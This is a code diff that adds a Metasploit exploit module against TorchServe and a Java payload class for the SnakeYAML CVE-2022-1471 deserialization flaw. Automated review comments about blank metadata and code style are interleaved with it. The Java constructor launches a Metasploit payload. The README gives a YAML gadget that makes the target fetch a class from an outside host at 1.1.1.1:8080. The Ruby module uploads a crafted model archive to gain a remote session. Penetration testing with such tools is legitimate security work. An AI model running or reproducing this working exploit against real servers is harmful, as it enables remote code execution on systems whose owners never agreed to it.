diff --git a/data/exploits/CVE-2022-1471/MyScriptEngineFactory.class b/data/exploits/CVE-2022-1471/MyScriptEngineFactory.class
new file mode 100644
index 0000000000..ae365960f8
Binary files /dev/null and b/data/exploits/CVE-2022-1471/MyScriptEngineFactory.class differ
diff --git a/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
new file mode 100644
index 0000000000..da5e382547
--- /dev/null
+++ b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
@@ -0,0 +1,72 @@
+// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineFactory;
+import java.io.IOException;
+import java.util.List;
+import metasploit.*;
+
+public class MyScriptEngineFactory implements ScriptEngineFactory {
+ public MyScriptEngineFactory() throws Exception {
+ Payload.main(null);
+ }
+
+ @Override
+ public String getEngineName() {
+ return null;
+ }
+
+ @Override
+ public String getEngineVersion() {
+ return null;
+ }
+
+ @Override
+ public List getExtensions() {
+ return null;
+ }
+
+ @Override
+ public List getMimeTypes() {
+ return null;
+ }
+
+ @Override
+ public List getNames() {
+ return null;
+ }
+
+ @Override
+ public String getLanguageName() {
+ return null;
+ }
+
+ @Override
+ public String getLanguageVersion() {
+ return null;
+ }
+
+ @Override
+ public Object getParameter(String key) {
+ return null;
+ }
+
+ @Override
+ public String getMethodCallSyntax(String obj, String m, String... args) {
+ return null;
+ }
+
+ @Override
+ public String getOutputStatement(String toDisplay) {
+ return null;
+ }
+
+ @Override
+ public String getProgram(String... statements) {
+ return null;
+ }
+
+ @Override
+ public ScriptEngine getScriptEngine() {
+ return null;
+ }
+}
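Review bot: The class has no documentation beyond the javac invocation on its first line, so a reader has to infer that the constructor is the only member with behaviour and that every interface method deliberately returns null; a class Javadoc such as `/** Stub ScriptEngineFactory: all work happens in the constructor; every contract method returns null. */` would state that. The three `List` return types on getExtensions, getMimeTypes and getNames are raw; `List<String>` matches the ScriptEngineFactory interface and removes the unchecked warnings. `import java.io.IOException;` is unused and can be dropped. The constructor's `throws Exception` is broader than whatever `Payload.main` actually throws, but that class lives outside this hunk, so the precise type cannot be confirmed here.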
diff --git a/external/source/exploits/CVE-2022-1471/README.md b/external/source/exploits/CVE-2022-1471/README.md
new file mode 100644
index 0000000000..a46db950d2
--- /dev/null
+++ b/external/source/exploits/CVE-2022-1471/README.md
@@ -0,0 +1,17 @@
+# Overview
+The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit
+CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
+
+## Compiling
+Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.
+
+## Usage
+Trigger the deserialization using the following YAML:
+```yaml
+!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]
+```
+
+Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
+contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
+`Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
+deliver a Metasploit payload.
diff --git a/modules/exploits/multi/http/torchserver_cve_2023_43654.rb b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
new file mode 100644
index 0000000000..75aa109cc7
--- /dev/null
+++ b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Java
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Java::HTTP::ClassLoader
+ # prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(_info = {})
+ super(
+ 'Name' => '',
+ 'Description' => %q{
+
+ },
+ 'Author' => [
+ 'Spencer McIntyre'
+ ],
+ 'References' => [
+ [ 'CVE', '' ],
+ ],
+ 'DisclosureDate' => '',
+ 'License' => MSF_LICENSE,
+ 'DefaultOptions' => {
+ 'RPORT' => 8081
+ },
+ 'Targets' => [
+ [
+ 'Automatic', {
+ 'Platform' => 'java',
+ 'Arch' => [ARCH_JAVA]
+ }
+ ],
+ ],
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [IOC_IN_LOGS],
+ 'Reliability' => [REPEATABLE_SESSION]
+ }
+ )
+ end
+
+ def class_name
+ 'MyScriptEngineFactory'
+ end
+
+ def constructor_class
+ ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-1471', "#{class_name}.class"))
+ end
+
+ def on_request_uri(cli, request)
+ agent = request.headers['User-Agent']
+ vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
+
+ if request.relative_resource.end_with?('.mar')
+ send_response(cli, generate_mar, { 'Content-Type' => 'application/octet-stream' })
+ return
+ end
+
+ if request.relative_resource.end_with?('services/javax.script.ScriptEngineFactory')
+ send_response(cli, class_name, {
+ 'Content-Type' => 'application/octet-string',
+ 'Connection' => 'close',
+ 'Pragma' => 'no-cache'
+ })
+ return
+ end
+
+ super(cli, request)
+ end
+
+ def generate_mar
+ mri = Rex::Zip::Archive.new
+ mri.add_file('model.pt', '')
+ mri.add_file('MAR-INF/MANIFEST.json', JSON.generate({
+ 'createdOn' => '04/10/2023 16:23:53',
+ 'runtime' => 'python',
+ 'model' => {
+ 'modelName' => @mar_filename.delete_suffix('.mar'),
+ 'serializedFile' => 'model.pt',
+ 'handler' => 'image_classifier',
+ 'modelVersion' => '1.0',
+ 'configFile' => 'config.yml'
+ },
+ 'archiverVersion' => '0.8.2'
+ }))
+ mri.add_file('config.yml', %( !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["#{get_uri}/"]]]] ))
+ mri.pack
+ end
+
+ def exploit
+ @classloader_uri = start_service
+
+ @mar_filename = rand_text_alphanumeric(rand(8..15)) + '.mar'
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => '/models',
+ 'vars_get' => { # *must* be vars_get and not vars_post!
+ 'url' => "#{get_uri}#{@mar_filename}"
+ }
+ })
+ handler
+ end
+end
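Review bot: The module metadata in `initialize` is left blank — `'Name' => ''`, an empty `%q{ }` Description, `[ 'CVE', '' ]` and `'DisclosureDate' => ''` — so the module cannot be identified by name or CVE in search and the framework's metadata checks will presumably reject the empty values. The file name says cve_2023_43654, so `[ 'CVE', '2023-43654' ]` looks like the intended reference, and the Description should spell out the TorchServe model-registration path the module uses and the YAML-deserialization chain it relies on, so that defenders reading the module can map the IOC_IN_LOGS note to concrete log entries (the POST to /models and the outbound fetch of the .mar); confirm both against the advisory. The `# prepend Msf::Exploit::Remote::AutoCheck` line is a commented-out include with no `check` method behind it; either remove it or add a comment stating why it is disabled. In `on_request_uri`, `'Content-Type' => 'application/octet-string'` is not a registered media type and differs from the `application/octet-stream` used for the .mar response a few lines above; the two should agree.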